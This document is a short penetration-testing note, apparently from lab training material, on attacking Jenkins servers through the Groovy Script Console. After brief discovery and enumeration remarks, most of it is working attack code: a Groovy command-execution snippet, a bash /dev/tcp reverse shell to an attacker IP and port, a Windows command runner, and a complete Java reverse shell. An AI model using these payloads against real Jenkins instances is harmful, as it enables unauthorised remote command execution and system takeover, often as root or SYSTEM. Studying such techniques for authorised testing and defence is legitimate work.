Jenkins is an open-source automation server written in Java to help developers build and test their software project continuously. Server-based system that runs in servlet containers such as Tomcat.

Discovery

Jenkins run on Tomcat port 8080 by default but also utilizes the port 5000 to attache slave servers. Jenkins can use a local database LDAP, Unix user database, delegate security to a servlet container or use no authentication at all.

Enumeration

By default Jenkins’ database is used to store credentials and does not allow users to register an account.

Attacking

Achieving command execution is relatively easy via the Script Console in Jenkins. It allows us to run arbitrary Groovy scripts within the Jenkins controller runtime often within the context of the root or SYSTEM account.

It can be reached at http://jenkins.inlanefreight.local:8000/script. It is possible to run arbitrary commands

def cmd = 'id'
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = cmd.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println sout

We can also gain a reverse shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Against a Windows Host we could attempt to add user and connect to the host via RDP or WinRM, etc.

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

We could also use this Java reverse shell for Windows hosts

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();